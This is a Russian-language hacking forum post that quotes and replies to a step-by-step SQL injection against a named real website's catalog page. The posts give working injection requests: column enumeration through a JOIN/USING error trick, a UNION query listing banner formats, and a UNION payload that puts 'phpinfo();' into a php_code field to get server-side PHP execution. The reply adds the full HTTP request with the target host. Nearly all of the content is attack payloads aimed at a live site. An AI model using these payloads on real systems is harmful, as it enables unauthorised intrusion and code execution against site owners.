Показать сообщение отдельно
Старый 09.01.2013, 17:53   #2619
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
вчера, пока изучал http://www.1md.ru/catalog/list/250'/
нашел имена колонок беспробельным методом от v1d0q (сам метод ("пробельный") вроде от Qwazar),
Код:
запрос для последней колонки:
GET /catalog/list/2501'and(1)=(select*from(select*from(fho_banners`a`)JOIN(fho_banners`b`)using(id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url))c)='1 HTTP/1.1
=> graph_down
=>
id,idfirm,iduser,bancat,bannersarea,banformat,startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,php_code,js_name,js_opis,js_code,url,graph_down
учитывая, что имя колонки php_code очень многообещающе сегодня решил добить:

Код:
GET /catalog/list/(251-1)and(1=0)union(select(1),(select(group_concat(banformat))from(fho_banners)),3,4,5,7) HTTP/1.1
=> {graph,flash}
логично предполагая что при banformat='php' должен вызывать php, пробую:

Код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
=>
phpinfo
Что-то не могу вывести phpinfo() твоим способам, хотя остальное все выводится

PHP код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
Host: www.1md.ru
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3 
Flakt вне форума   Ответить с цитированием